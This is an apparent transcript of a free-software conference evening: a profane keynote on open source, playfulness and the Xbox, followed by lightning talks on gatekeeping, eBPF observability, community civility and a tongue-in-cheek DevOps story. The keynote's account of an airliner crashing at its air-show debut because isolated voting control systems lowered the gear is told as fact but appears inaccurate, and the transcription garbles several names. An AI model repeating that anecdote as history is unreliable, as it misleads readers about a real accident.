you're showing off the stuff to do to your friends. I've had some interesting experiences at places like Microsoft and other unfortunate employers where I've tried to explain to people that we need to give, I will quote the anal class, the class of people who make something from nothing. You have to give this group of people as much freedom as you possibly can if you want to make any money. Okay, and money guys will immediately tell you that you need to constrict their freedom as much as you can. We must make a walled garden. I love that term, because, you know, I don't think the prison exercise ground is a walled garden. They want to have a euphemism where you own everything that somebody makes, but you still expect them to be really creative and able to show off to their friends. It never works. It never works. At Microsoft, we had a real problem when we were starting this Xbox game console up, and in case you don't know, I am colloquially known as the father of the Xbox, which is kind of fucked up, because I don't know if it'll ever want to move back in, but if it does, it's fucking paying rent. But in fathering, a plastic box filled with transistors, I had to figure out a way to get the most important people in that ecosystem to feel freely creative, and that's the game developers. You're going to make games for the box, and they don't work for Microsoft. They work for a thousand different companies. In fact, the best ones are working for a company that doesn't exist yet. They have an idea nobody's thought of yet. The idea of better than the big game publisher is better than the other console manufacturers because he's working alone. She's in her room at her mom's house developing something that's the coolest thing you've ever seen. How do you get that to that person if you're Microsoft and you want to fucking own everything? Because they want to own it fucking everything. How do you get it there? Well, you have to convince them about this model that I'm talking about. You have to tell them that freedom leads to creativity, which leads to the creation of value from nothing, right? It's something that I think about all the time. I was fortunate enough when I was young and stupid and recruiting people for a game company at MIT to meet Richard Stallman, the fucking God walking the face of the earth. And he explained to us something that stuck with me for a really long time about all this. And that was this concept of showing off to your friends that if you didn't have, and it was really obvious to all of us then, because I'm an older guy, we started programming in the late 70s and the early 80s and there was no GitHub, there was no internet, there was nowhere to get any kind of code that you could copy or look up, maybe in magazine. And there's no way to distribute anything you did. So the only joy you got out of writing code, aside from kind of a masturbatory joy of seeing that you could do it, which is I don't want to discount that. That's another talk entirely, but you get the joy of showing your friends and hey, I did this amazing thing. And then something magical happened which was totally new to me and I think very new to culture in general, which was automatically your friend would be inspired by that and maybe do something even better. And then maybe you do something even better than that. So we were steeped in that culture. And guys from my generation, I'm very proud to say, it made so much of the infrastructure that we take for granted today. Incidentally, all running an open source software, right? And the reason it's all running an open source software is because that generation of people who wanted to show off to their friends were encouraged to do things better and better and better, more secure, more real. When everyone can look at your code, you write good code. When everyone can evaluate whether or not your shit works by looking at how it works and making their own tests, you don't lie, okay? When some software is operating a nuclear power plant, I'd like to think that more than one guy had looked at it. And furthermore, I'd like to think that the guy who wrote it was having a good time writing it, that the person who wrote the controller for the cooling towers, right? She was really excited to show her friends how there was no scenario in any test that could cause it to melt down, right? That place of play and creativity. It doesn't matter how serious the job is, it's play and it's creativity. And there's a positive side to it, which I've been talking about. And game development for me has been a tremendous source of a lot of this because the product of game development is fun and happiness. And so you kind of want to make sure everybody's fun and happy making a game. Tell electronic arts that, but separate talk also. There's the dark side. And there's a great story that I often tell that I probably shouldn't name names in here, but it involves a large European passenger aircraft corporation and a certain model that they had. And the way that modern jetliners work obviously involves a tremendous amount of software and automated control systems. And we have moved past this idea that there's a physical connection between the thing the pilots hold and the control surfaces of the airplane, right? And this was a big tenet of Boeing for a really long time. They wanted to make sure that there was a control surface. There are a couple of accidents, unfortunately, that showed that no matter how enthusiastic a pilot was, they couldn't apply 180 pounds of force on the stick for the hour to get back to the airport. And so people have been in this idea and they said, okay, maybe it's a good idea to have actuators that have software running this. And of course that's dangerous because programs crash. A friend of mine at MIT worked on the F-22 fighter control system. He told me the F-22 could reboot at 22 Hertz. I'm like, I don't know that that's an awesome thing to brag about, but that's pretty amazing. And so the way that people thought about this is voting. And most of you guys know this and a lot of systems do this. They vote. There's a point to this story, I promise you, so just stay with me, okay? So at this large European passenger aircraft manufacturing company, they had the idea that they would have separate teams of people with no contact, make separate systems that operated with completely different control laws to decide what to do with the control surfaces when the pilot moved the stick and the throttle and that they would devote. And whichever got the most votes is what the control service would do, right? And they isolated them from one another. So the feedback that they got was only to themselves. Worse. Worse. They told them they couldn't talk. So all the fun was gone. Nobody was showing off to anybody else. And then they had a shared cafeteria. Ha, ha, ha, ha. It is not that funny because the first Paris Air Show debut of this airplane resulted in the airplane doing a fly by, the airplane control systems deciding this must be a landing, extending the gear and everyone died. There's a really dark side to this and it's a lesson. And I think it's something to also keep in mind when you talk about the many benefits of free software, when you talk about the evolution of Linux and why it's so important, why it runs the world. So understand that the openness and the playfulness, the acquisitiveness that causes people to want to work on free software to work with free software to share software to work together on projects, where the value is the input of the ideas and not the control of the license is critical to make systems that matter. So you can go all the way from halo to crashing jetliners and find examples of why it's important to drive what you do with this playfulness and this inquisitiveness and go a step past that. And I think understand the point of this entire exercise. And when I look at a conference like this, the point of the conference is to learn more about how to engineer into the process of making things the spirit of openness and sharing. So that baked into these systems is a measure of this safety and a measure of this fun. And it's also important for ensuring that the world isn't just sort of a grim hellscape. And part of the reason I say that is that interfaces are miserable at the moment. You know, if you fly on an aircraft and you're trying to use the in-flight entertainment system and if you're an asshole like me, you're like touching the screen and you're like, oh, that's three quarters of a second. You touch it like, that's almost a second. Yeah, fuck these guys. Like, okay, what if I touch twice? You know what I'm saying? I'm like spinning half the flight trying to crash this fucking thing. And I'm imagining the team that put this thing together and on different airlines, if you become a connoisseur of terrible in-flight software, as I have become, you'll imagine what the working environment of these software teams was like. Like, what concrete basement were these poor motherfuckers in? And how little time were they given to get this piece of shit done, you know? And you're like, okay, clearly these guys were given like the last generation of like video player that's somewhere and has a terrible response time. And like, you know, it's libraries are like in Fortran. And they're like, okay, what are we gonna do? And they're like, oh, you have two weeks and $20,000. Just like, ah. And then they're good ones. And you know, I've programmed so much and worked on so many projects now being ancient that, and maybe some of you will agree with me here and tell me that I'm not totally insane, but you can kind of feel this when you're using it. And the airline entertainment system is a really good example because it's a completely captive audience, right? You can Turing test the shit out of this thing and you have hours and hours to do it. And so I enjoy trying to figure out what's good and what's bad but the overarching feeling that I get, you know, trying to use these systems again and again is the same thing. It's that the joy that the team of people felt making it is the joy that it gives me. And if the team of people making it had a shitty time and a bad boss and were miserable and didn't have enough resources, I'm gonna have that experience. I usually have that experience. Drinking helps a lot if you have a couple of beers. Yeah, the response time becomes less of an issue, but the trick is that even when you're trying to be entertaining, you can be totally un-entertaining. If you haven't built the software and built the system in such a way that you have this play involved in actually architecting the entire thing, okay? And I think that in the early days, in the UNIX days and the pre-UNIX days, and when I started programming, it was completely extraordinary to find jokes in the manuals for software and for computer systems. You know, I wasn't ready for that in the late 70s and the 80s because the world was very serious and engineering was very serious and computers were NASA, computers were on Star Trek and they never told jokes and it was totally serious and then you'd be looking through the manual for something and there'd be like a UNIX joke and I remember the IREx manual, the Silicon Graphics manuals were fucking hilarious, made jokes about like the hostage crisis in Iran and stuff and I'm like, what the fuck is going on here? And I thought, you know, when you're in that culture you think this is really special because we're working in these computers and we're special people and we don't have to follow the same rules as everybody else and we can have fun, we can tell jokes and we can be different, we dress how we want and we can have long hair and we can be whatever gender we want and there was really a true thing and it was a completely special time but the thing I didn't realize at the time because I was too young was that the reason all those things were true was because it was a group of people who were creating value from nothing in a way that the other business people couldn't figure out and they reacted to it by working together and having fun doing it and so the jokes and the joke names for everything and things like having a penguin logo for your operating system and all the other stuff that we fucking love came from that playful spirit and you think, oh, that's just because we're underdeveloped kids, we never grew up, we're not serious like the bankers and this is, again, back to your sister's boyfriend who looks at you because you dress like this and you don't dress in a suit like he dresses to go to his fucking job as an investment banker. Okay, fine. But the... Brother. And I want you to know, my son is sitting like somewhere like right over there, he will confirm, I am wearing pants for this. That's a big deal. But the playfulness doesn't come because we are malformed human beings or because being good at math or programming makes you somehow socially stupid. I would say quite the opposite. In fact, I've argued this many times before but the level of social interaction at a D&D game is much higher than any fucking cocktail party I've been to. And I've been to a lot of high-end cocktail parties and those people be fucking dull. I used to work for Steven Spielberg and when I came to DreamWorks, and I don't want to go over my career because everybody does that and it's really fucking boring, but I reported to Steven. They were like, oh, here's your job, here's your boss at Steven Spielberg. And I'm like, the fuck? Okay. But years later, when I was doing interestingly entertainment finance, which is a totally separate story, I was talking to him one day and I had to give him some piece of information about our business. And I called his attorney, Harold Brown, who's also an awesome, fun, loving guy. The entertainment business has a little bit of this. I called Harold and he wasn't available. All right, so I called my boss who ran this big company that worked for Steven. I said, hey, I didn't talk to Steven and he wasn't, boss wasn't available. All right, so I called Kathy Kennedy, who was his producing partner and his old assistant. She wasn't available. I was like, I have fuck it, so I call Steven. Picks up first ring. And I was like, hey, I tried to call Richard and Harold and they didn't answer. And he's like, James, you don't fucking get it. I had all those people so I can sit around and answer the phone whenever I want. Like, okay, I get it. Very good story. And I told him about this problem and I was saying, you know, it's kind of weird. I deal with all these financial people all day long and they're really concerned about like whose name is first on an email and who gets invited to lunch first and like who makes slightly more money and which model year of car they have and it's starting to really freak me out. And he said something really wise. He said, hey, you know, when you're walking down the street and you're walking past a tree and their ants climbing up the tree, you think to yourself, like, what do they, do the ants see me? Am I terrifying to the ants? Like, are they just talking to one another? Like, are they living in the ground there? Did they come a long way? Do they all know they came a long way? Like, what's it like to climb? What's up the tree? What are they thinking? It's not that bad a story. It's really, it has a good punchline. Okay, so yeah, anyway, so he said, listen, those guys in the other world, they don't think that way. They're not having that imagination. They're not walking down the street, imagining a page of code, or walking down the street imagining some way to use a piece of technology to do something magical. They're walking down the street thinking, who else is going to the lunch I'm going to tomorrow? And can I be in a better spot than them? And he said, you should feel bad for those guys. You should feel bad for them. So, a subtext of this is, if anybody's ever made you feel bad about being in this world, fuck them, because this world kicks a shit out of their world, okay? All right, so I'm gonna, I'll leave some room to ask questions, and hopefully nobody asks questions, and I'll get to finish early, which would be great, and have a beer. But, the last thing that I wanted to go into is kind of the corollary to all of this, which is something that, I figure you guys think about quite a lot, and I know you come from a very diverse background of different industries and experiences in life, but you're all here at a free software conference, and so you all have this kind of experience in common. And maybe it's something that nobody tells you enough, and it might sound really cheesy, but you know, the entire world basically operates right now because of free software and how it started. There's no part of our lives that isn't touched by the philosophy of Stallman, by Linus, it's nothing. No part of your phone, this presentation running on this Apple laptop, and what is the Apple really running? You know? That's right. Well, a shitty version of, yeah. Yeah. Yeah. Nice. But, I think that we get all tied up in shit around what's the newest thing, what's the newest trend, what's going on, what do we need to learn, what's happening, who am I talking to, what's my project, how do I find a boyfriend who's not abusive, all these things. And you might forget the overall context of the fact that as much as we're in like a shitty hotel room here, and as much as people don't take this as seriously as they should, the shit that we do runs the whole world and they'd be super fucked if we didn't do it. And it's just true, right? I mean, what's the first thing that somebody who knows what they're doing does when they're given a new computer that has windows on it and it has to do something important. That's exactly right. And then what do you do for fun when you go home is you try to put that same operating system on a Raspberry Pi Zero and freak out for like eight hours and then finally get the kernel up and it doesn't really work, but you still think it's victory. But any computer that needs to do anything important that's in real time, any system that needs to do something that's important or connect to other systems, any time important data needs to be transferred every stock trade, every crypto trade, every contract, the transmittance of every contract, smart or not, every flight schedule, every space mission, every robot on another planet, all of them depend on the continuation of free software and the spirit of play and innovation that built it all and try to keep that in mind through the times that suck, okay? All right, I'll take questions now. I have a slide for this. Oh shit, people are raising their fucking hands. Okay, all right. I'll give you a copy of the slides for sure, freely available. What's my favorite open source software? I have to say my favorite open source software is the numerical libraries for Python. I think that NumPy and that OpenCV are absolutely fucking changing the world, right? And making the world safer and better. And my favorite video game is, yeah. What's your favorite song? I don't fucking know. Like, the first functional build of Halo is my favorite video game, okay? But I still have on an Xbox dev kit and play and it runs for almost five minutes, but it's a glorious five minutes, man. Do new developers? You know, it's boring. It's find a place where you can play. Like, if you're doing something and you're not having fun doing it, you're gonna be fucked. And it's not always fun, right? It's pain in the ass a lot of times, but if there's no core of play at the heart of what you're doing, I don't care what it is that you're writing, you're fucked. And I know that's like an Old Testament kind of a message, like a thou shalt not kind of a thing, but that's what it is. Have fun or you're fucked. I should put them in a gravestone. Over here, your X window comment was straight up. Oh, next step, oh, even better. Yeah. I have stories about next step. I have not. I'm sorry, dude, I, sorry, Neil. Is Neil here? Am I, oh, okay, sorry, Neil. Really sorry, Neil. Is that it? Your other question is about the dead guy also? Well, you get one question, it's okay. You made me feel bad. So, yeah, I know, I mean, well, just think about the amount of shit code Don Nuth's on his life. Right? Right? Do you know who Donald Nuth is? Have you read Donald Nuth? So the truth is that the world pumps out shit at a prodigious and terrifying rate. And software is no different than anything else, than news or books or anything. And the trick is, I'll tell you, as an older guy, is just to keep learning. So when you're hitting a, you know, even if on a single project, if you're hitting something that's just really pissing you off, or you're forced to work with somebody who's just writing garbage, like give it a break, work on something else, some other part of the system for a minute, learn something else. I have in the past, I was taught a trick by a guy called Doug Church, who's one of the, he works at Valve now, I think, wherever he is, but one of the first architects of real 3D in real time. Doug would just switch languages. He'd be like, okay, I'm gonna do this in Aida now. And it would piss him off, but then he'd get back to it and it was okay. All right, you've had enough answer now. You're a neighbor. Oh, I would say MIT. Yeah, but that's just, that's just regional pride. That's so there's no, you know, the thing is that the standardization of open software licenses is one of the greatest gifts that we were ever given. And so, you know, I think that, yeah, I can't say enough good stuff about that. So yes, but it's MIT for sure. And this goes on, I've used a lot. I forced Microsoft to use it too, which was a trick. Conferences like this, obviously. No, this is really cool. I was, I was, so I was distracted by my son. What? I'm sorry. What's your favorite way, or what's the best way for software developers to meet one another? Conferences like this. Okay, there you go. Okay, sorry, that's a cheesy answer. I was, so I'm gonna hold my son again. He's the only person you'll ever meet. He gets into like Berkeley and MIT and goes to art school, which is true, he's badass. He was like, what are we going to? It's a UNIX, what? And I explained to him what was going on. And he was like, this is really fucking cool. This is really, really fucking cool. And it is really fucking cool, you know? Somebody from you. Oh, man, I have a really demanding day job and I fuck it up so bad that I gotta work on that for a while, but thank you for your vote of confidence. I've been trying to avoid like this guy all night. All right, go ahead. What do you got? What do you got? So what do you say to the entitled user that keeps unanswered for more and more shit? There's a great story about this and you can use this story, okay? There's this legend at Microsoft and I met all these guys at Microsoft for a long time who helped to get Xbox approved because they're really senior, right? And they saw in the spirit of that project like kind of how Microsoft was before Antitrust and all that. Because it was very exciting and cool place when they first started it out. And they would tell the story of that guy. And so the user you're talking about is that guy. And one of the huge mistakes that was made on Windows was servicing that guy. And you can tell, like in Office and in Windows, it's like this weird thing where it's like mistaking options for value. It's like you could do everything every way and that is not increasing the value in any way, right? And they basically fucked themselves on that. So that guy became a curse, right? And then Apple comes along and does very concise user interface stuff and windowing systems stolen from elsewhere. And... That's what it is. And suddenly the world sees the value in actual value. And so, you know, the rude way is to go to that user and say, don't you have a fucking job to do? Aren't you using this software for something? Why don't you do your... Why don't you get your work done and shut up? Okay. Yeah, yeah, I should never be in PR. Well, yeah, I do. And I had to deal with a little of this. You're never gonna get them to make their software free. And what you're gonna do is you're going to go and mine for examples of places where open software made other companies money. And it's often not obvious. A lot of companies have made a lot of money with free software and open source software because they have delighted their users and they've created economies of developers who make the product stronger. There are also cautionary tales that are really useful to use of companies that did not like choose an open architecture that got crushed and became road pizza. Okay. And, you know, I can think of several graphics companies that have done this. I don't want to name names and be a dick. A special effects software has a couple of examples of these. So go to those and find the one that matches your company best and say, here's the bad case. And it's the good case is we can get a ton of people doing free work for us by just opening this up. And a lot of it is just getting people over this fear. And again, you know, this is the divide culturally between the people in this room and the banker dudes is that we feel okay betting on our future selves to make more value. In fact, we have to. This is where we're going to pair our rent next month and next year is that we keep on writing more code, right? So you trust yourself to do that. Those guys are playing a zero sum game. They're always thinking about a zero sum game. So it's like what we own now is what we have to exploit it. And so you're pushing them into a different mindset where they realize that the value of their company isn't the code base they have right now, but it's the team that made that code base that will continue to work on it. And that's really the arguments you need to find a way to make. All right, we have like maybe two more questions. Did everybody hear the question? This is a question about the inner source and other types of open source theater that's going on right now in large companies. And I think open source theater is exactly what it is, okay? And you know, and I think it's frustrating and as nerds it pisses us off because they're full of shit. But it's a step because when cultural change needs to happen, like I was telling this gentleman, that these guys need to get over their fear that the code they have right now is the value and realize that the team riding in the new code is the value, right? If they see that enough that the PR people are starting to do messaging about that, that's a step. All right, one more, the guy in the back. And if you yell, I don't have to repeat the question which is awesome. Only, well, where are you in Mexico? That's really, it's a question. DFA, okay, I'll go to DFA until I'll say anything in DFA. Just to get some proper DFA tortillas and to get some proper DFA quesadillas. Por supuesto, hombre, sin dudas. I would do this in Spanish, pero no hay nada que se puede hacer, okay? All right. All right, I think that's all I'm gonna do for now. So thank you very much. I'll see you guys later. Hello, everyone. Oh, this is loud. Thank you, Seamus so much. One more round of applause for our opening keynotes. We liked them so much. We gave them a two night gig. So next up we're gonna be transitioning into upscale which is our lightning talk series. We've got some great content for you. We're getting set up, so that'll be in a minute. If you missed the first round of drink tickets, my friend Luis in the back has them. If you haven't already gotten one, he's about to get mauled. Please be nice to him. And there are still lots of snacks. So grab a snack, get your seat and we'll begin in a few seconds. All right, everyone, we're ready for upscale. So please take a seat. If you're still waiting in the bar, just wait quietly so we can have our first speaker start. All right, if you're in the back standing up, we'd love and appreciate your silent talking or slower talking. Do we get slides up? Your slides disappeared. Move the chair too, so you can move around. Good. All right, so without further ado, I'd love to introduce our first speaker. This is Solona. She's gonna be talking about the unconscious gatekeeping in tools. So give it up. No one told me I was going to be following Seamus. All right, so first of all, what is gatekeeping? I love this word because it's accurate. It is basically obstacles that you put up that keep people out. And I'm mainly going to be talking about unintentional gatekeeping, not all the other types of gatekeeping that go on. In fact, in regards to gatekeeping, why does it exist? It's because of actually what Seamus was just talking about. This whole scarcity versus abundance on a lot of these different things, but we do still deal with scarcity. And on this talk, I have scarcity in regards to the fact that I'm not going to cover accessibility. There's a lot of stuff out there. There's a lot of, these are all open source tools. It's y'all's responsibility to get out there and find that out. So what I wanted to talk to be was more like things like role diversity. We need more than just developers in open source. We need all of these other roles out there and we need to be more inclusive towards them. We also need to watch out on language. We end up excluding so many people when we don't allow the multi-language capabilities in regards to the tools that we create. Please remember to bring those in. And then also time zones. Don't depend on everything being synchronous. Think asynchronously. Try to introduce that in some format even if it's not always as friendly to your tool or gathering. Also, cultural. Do you want to explain to this woman why you call things master and slave? Maybe it might be okay if you insert a BDSM joke, but for the most part we've got some cultural gatekeeping that we have to take care of and we need to look deeper at. Also, meritocracy is a myth. We do not all start out equal. And so we have to make sure that in our tools we don't assume that either because we end up blocking a lot of people from participating. Money. It's another unintentional gatekeeper. Yay for scale being $90. Oh my God. That's some serious, you know, and even then I know that Elon lets people in for free. Also age. You know, we got the gray beards in here, but we've also got the youngsters. If you don't have training materials that are in video, they're not going to participate. You have to go where they are and you have to bring those different things in. And then lastly, well not lastly, I got some more tribal knowledge. I think this is the biggest one. You know, here I've got the jargon thing going on. Also the acronyms thing. Also all of these other different assumptions that we make in regards to people's knowledge that keeps people out. Also, security theater. We really don't need all of those password rules. There's other ways of doing security. There's other ways of doing things of that nature. This isn't the way to go in regards to doing that. And you do keep people out, especially like elderly and such. Also, we have a lot of inertia. Why was QWERTY invented? To slow things down because these things jammed. We do so much of that in technology where it's always has been the way that it's been done and we keep people out. This hurts, like for example, disabled people. Learning styles. Lots of people learn in lots of different ways. If you don't address those, you lock people out. There's a ton of people in trade school who could be coding right now. If you actually took the time to make sure to bring things up on their levels. Also, privacy and encouraging spy versus spy behavior in your environments. We don't need that kind of behavior. We don't need the 4chan world and we don't need the world where people don't have privacy. And you need to go out and get people, okay? You can't just sit back and wait for it. If you fish in a goldfish bowl, you will only catch goldfish. You've got to get out there. So I'm going to disagree with Seamus on that one, not just your friends. You got to get out there or you got to get some of your other friends involved. And then I know I'm forgetting some things. I came up with one just a little bit ago in regards to idioms. There's all these other different ways that we unintentionally do it. And so you have to think for it. So the next thing you have to look at is sit there and say how much of this in a weird way is intentional? How much of this is accidentally driven by ego or selfishness or insular natures? Get out there, work with other people, go and talk to the designers. To prevent a lot of this, remember you need to have the spirit of mentorship. You need to go to other people and outreach to them and bring them up to the top of the mountain. You don't get to sit there being the guru, all right? That's not what we're doing here. And then lastly, fixing it. You have to listen and you have to give them lots of different ways to give you feedback so that you can help them. And if you don't do that, then you're never gonna get to where you can actually fix it and fix it in a way that they can work with you. Thanks, I'm Solona Bonewald. Find me on Twitter. Big thank you to Solona for opening up upscale. Upscale is surprisingly hard gig to talk at because it's five minutes, which seems like it should be really easy, but you have to cram in as much time as possible and as much content, and your slides auto advance every 15 seconds whether you want them to or not. So if you're seeing some interesting timing, that's part of the fun and we wanna keep cheering our speakers on even if their slides are a little bit off. It's what keeps us a little bit entertained here tonight. All right, so with that, I'd like to introduce the next speakers. I think this is actually the first duo we've had. At least since I've been hosting Upscale for five years. So let's welcome our first speaker duo, which is Dr. John and Seth and let's give him a big round of applause. Thank you very much. Our presentation is, what the fuck is EBF and why should you care? Let's go into it. Glad I explained this. Just in case you're curious, who is who? Dr. John, I'm Seth. We both come from a company called Spiderbat. My background's all in cybersecurity. John's all in cloud and containers and he's gonna tell us a little bit about logging, which is our most fun topic. Yeah, so we've got a few types of logging. We've got kind of traditional logging, which is discretionary. We don't have to do it and ultimately bad people are gonna try and avoid that because they don't wanna log their exploits. We've got some mandatory logings of things like Audit D, which has been in the Linux system for a while. Audit D tracks basic stuff by default, so system booting, people logging in and out, that kind of stuff, SE Linux kind of escalations. And with additional configuration, we can log other stuff if you configure it the right way. Here's what you get. It's fun looking through this stuff. So typical Audit D kind of message that tells you who did what when at some level. Here's another example. And now we're trying to answer like, okay, so somebody did a pseudo command. When did they do it? Who was it? What did they do before this? What did they do after this? How do I stitch all this stuff together, right? Audit D understands containers, right? No, so unfortunately it's not container aware Audit D. It's been in the, again, in the Linux subsystem for some time. Won't tell you what's running in a container, what's running outside of a container. It was kind of designed before containers were really on the scene. And you're sad. This actually looks a lot like my, a cat I used to have called Mr. Pinky. It looks like he's got a little bit of a boo boo on his foot there, so he's sad. So Seth, tell us about EBPF. All right, so now enters the hero of our story, EBPF. We have got to go all the way back into the 90s when a couple of brilliant people from Lawrence Berkeley Laboratory created a pseudo device in order to be able to capture packet data, specific packet data they want to filter on. And they essentially created a virtual machine in the kernel space. So we have a kernel with a privileged ability where we can now implement observability, security, and networking. In the 3.18 Linux kernel, we extended that, which allowed us to really create EBPF for any trace point in the system. What that allows us to do is create a bit code program that passes through from user space into kernel space through a verifier where we can now compile EBPF, essentially filter on any system trace that we want. Now here's an example, because what most people will do is pass that through an interpreter like Python. So you get your library, and now you're writing EBPF, you'll notice it's very much like a C-like program where I can now, in this case, I want execve in and then out where I'm getting execve information. Now, if you're not familiar, Brendan Gregg has a ton of BCC tools that you can use freely available and get examples of things like, how do I get execs snoop? How do I get open snoops? So you can go through his examples and we have links at the end of this presentation. There's also BPF trace, so if you don't want a Python interpreter, you can use an Ock-like interface to now write BPF so that you can pipe into your program's information that you want to pull from EBPF, which is great because you can pull it into your own data model very differently from Audit D. So now, go ahead, John, tell us more about what we could use EBPF for now that we know how to get it. So three use cases we'll talk with you. Networking, observability, and security. EBF sounds cool, what can I use it for? First up, networking. So there's another subset of EPF called Express Data Pass. So basically, we can intercept packets as they come into our interfaces, we can manipulate them, and particularly in the container space, folks are using this for like traffic control, network policy, firewalling, and so forth. Observability, we can get a very granular visibility of what's happening in our systems, our Linux systems, our containers, what they're talking to, what processes are running, what network activity's happening. Hell knows it's real difficult to understand what's happening in Kubernetes, this helps us try and understand it. And then security, so taking that observability, understanding at a granular detail, who's doing what when, who's executing what privilege is, who's moving laterally, exfiltration, we can get unparalleled visibility into what's happening. How can you learn more? EBPF.io is a great resource to just go to, tells you all about the EBPF project. We've got a few other links here, including a great webinar, just to explain the basics of EBPF and how you can use it. Some things we're excited about, so BPF LSM, so think SE Linux, App Armor, but now I can actually block specific system calls, service mesh, it's actually coming to Windows, believe it or not, and there's open telemetry. And finally, hey, is this company called Spider-Bat that can show you what EPF's doing and really help you visualize it? Thank you, Seth and John. All right, thank you so much to Seth and John. The next speaker up is Kim, and I hear she's gonna talk to us and teach us how to be nice. So let's give it up for Kim. We'll see, are you filming this year? Are we filming this year? Sure, well, no, I was gonna say, well, cause I fucking hate slides too. So I did not prepare slides, but you're gonna see a lot of cute dogs and we're going to ignore them while I do talk about community. Cause we've had some stuff going on in this community lately that hasn't been nice. Somebody does a tweet and everybody jumped on it and people just freak out and they attack and we just need to stop attacking. So, but what I do wanna say is this is my view. This is not, this doesn't have to be yours. This is definitely not my organization's view. This is mine and I'm gonna share a little bit about what I've seen going on in the community lately and how we can all build a nicer community. So they did not give me any notes. So we're gonna have to look here. Hold on a second. Enjoy the Paris cat. It is a Paris cat. So why we were here, we love open source and that's why we're here. It's transparent. Yes, thank you. It is transparent. We like to collaborate, wag our tails together. We like to be inclusive. We cooperate. We learn from each other. It's openness and it's engagement and it's openness and sharing and not leaving the puppy out, is it? But as I just mentioned, some of this stuff, hi David, is just not happening lately and I think it's time that we start, instead of blaming, we seek to learn and instead of shaming, we seek to understand and we try to do this without the screen of social media. So you'll see a blank screen here in just a minute and that's my shaming of social media. This is our seeking to understand and if you know me, you know both of those. So why are we all here? First off, it's the technology. We come for the technology, we love it. I'm from the cloud native side. We all have our favorite technologies but beyond that, when we build community, it's about bringing together our innovation and ideas and everybody kind of coming together and sharing these ideas. We love to talk to each other and share what we're doing, how we're doing things. The most fun I have is when I go to his conference and oh, this goes with, what is this one? Oh, poor Cole. He did not, the jumping cholla but I don't remember what this one goes for but that was my puppy. He was six months old and was a jumping cholla but we come to these conferences and we talk together on how to build community, on best practices and I will go to a cube con and I will be speaking with our competitors and we are competitors and we're talking on best way to build community because at the end of the day, that's how we are raising all of us, raising this tide above. This is technology, this is why we're here but when we get beyond that, it's time for all of us to just look at our transparency, look at how we can work together, let's stop shaming, let's stop hiding behind social media and slamming people when they do a tweet and let's come to these conferences and get to know people and have a good time and that's all I get, got, you get to enjoy the puppies. Thank you. All right, can we give it up for Kim and more importantly, Kim's puppy. Look how cute. We need a few more dogs. Awesome. All right, so. Some cute puppies. We're gonna. All right, so while we get a demo of some more puppies, I would like to introduce our next speaker, Jeremy, who's gonna be talking to us about DevOps. Yeah, so this alternate title for this is DevOps when I was an asshole, because obviously I'm not one now. All some of you can attest to that. Yeah, so when I was, we're gonna go like a time warp when I was probably two years old at this point, but about 30 years ago, 1995, I guess if we do the math correctly, I was working on an internet provider and started out doing support. I was actually building all of those nice little CDs you used as coasters that included things like WSFTP and Winsock, who remembers the good old Winsock days. That's right, let's fuck it all. So in that company, we started to expand really, really quickly and grew three floors. The CTO, VP of technology, decided that we should run the cabling and then have the contractors go ahead and connect everything at the wall and they can handle it, we could just do the cabling, which really was not the greatest of ideas and he had a plethora of really bad ones over the years I was there. And it didn't really make a whole lot of sense. And then he came and said, you know, we don't know where any of those cables go. So you should grab a tone generator and go to all of those and figure out where they are and now mark them on the patch panel. And really, this was my thought, like really, and he really kind of said, like, you know, we should really do this, which really meant me was gonna have to do this. So I started figuring out, okay, we've now expanded about 80 new people, three different floors. I'm gonna have to take a tone generator, all of these, I didn't major in math, but I figured that was gonna probably take me eight to 10 hours or a couple of days and the 20-year-old in me was not amused at all. So I kind of stepped back and I thought, you know, this really sucks. And I'm sitting back and I was in the data center, I kind of look behind me and I look and I see all these patch panels. And I thought, you know, what if I unplug one? And this is very similar to the conversation, complete with GeoCities, Udora Mail, WinSockPop, you know, all of that, the Popcorn server, we all remember the Pop3. And so I said, you know, let me, let me see, what does it say there? What is the number? Kind of realized this was my opportunity to really do this really quickly. Plugged it back in, everything works. It was just pretentious enough, the whole building over the next hour, experienced intermittent network outages as everybody went down for a short period of time until they called me. So I realized at this moment, this was DevOps. This is what we do. We get everybody involved, whether they want to or not. So I started to understand all these different principles of DevOps. So I encouraged teamwork. Everybody in that fucking building got involved. Together, we solved those intermittent network outages. All of us together, teamwork. I also reduced the silos within the technology because all of a sudden everybody was together. It was not marketing over here, it was not sales and whatever the other teams do. It was all together. Also I live in Kansas, we didn't create any silos during that time. I think it was a win. Also systems thinking. It was everybody again together. We included the systems that were there available to solve those network outages. Systems thinking. This was also a picture of me at those days. I also learned from failure. I understood that the failure of the asshole VP that we should have just done it ourselves and been able to hook everything together and make note so that we wouldn't have to redo things over and over. We did that. We also communicated. Those of you who don't remember the 90s or weren't born then, we also used phones for more than just TikTok dances. We actually talked on them, which is a really weird thing. We'll talk about that later. I also accepted the feedback from every single person to call. They said, this doesn't work. And then I fixed it. And their feedback overwhelmingly was, you're awesome. So it was good. It was a good day. We also iterated rapidly. I started with one or two and then we quickly moved it up to five to 10 to 12 at a time and really just kept things going. It's kind of like when you're building a deck, which you don't want me to do. Then we automated. And really that automation came down to I just polled whatever I could and just continuously did that over and over and over. Everybody got, again, everybody was involved. It's really what you do with DevOps. Now all of this is in jest because that is fucking not how you do DevOps. But I hope that you go out and check out Emily Freeman's book. It's a great way to get started and understand what DevOps is. And with that, I say thank you. Jeremy can make my slide decks any day. I don't know about you. Thank you so much, Jeremy. We've got two more speakers on deck for you. Next up, please welcome Arti and she's gonna be talking about where inequalities begin. So please give her a round of applause. Welcome her. Hey. Thank you. Thank you, thank you, thank you. Oh, hey, what do you know? Another room where nobody else looks like me except you. Yay. So I'm here to talk about Mind the Gap, where inequities begin. So who the hell am I? I am an educator. I used to be a kindergarten teacher. I've taught special education, all of that stuff. And I've done DEI work. But as we begin this session, I'd like to start with three agreements. Please stay engaged. As a kindergarten teacher, I do not brook any nonsense. So know that you might. Let's make that you will experience a dense comfort. So let's start with an experiment. Close your eyes if you'd like. I'm gonna tell you a story. You're on a plane and the pilot welcomes your board and then you attend a keynote talk by a Silicon Valley CEO. And then you go to a restaurant where a couple is planning, celebrating their dinner. Who was the pilot? Open your eyes. Was the pilot a female? Was the CEO black, a woman, Latinx, Asian? Who were the couple? Were they two men, two women, were they trans? I'm gonna bet they weren't. So race plus gender plus class. They make interlocking power relations. The systems that oppress girls of color who are traversing what's called the pipeline. And these affect women's abilities and likelihood to enter careers such as STEM. So tech has had a focus on populating the pipeline with girls of color without actually taking the time to investigate. Where's the leak? Where are the girls of color? Where are the women? So this is what has resulted in tech not being able to hire or retain. 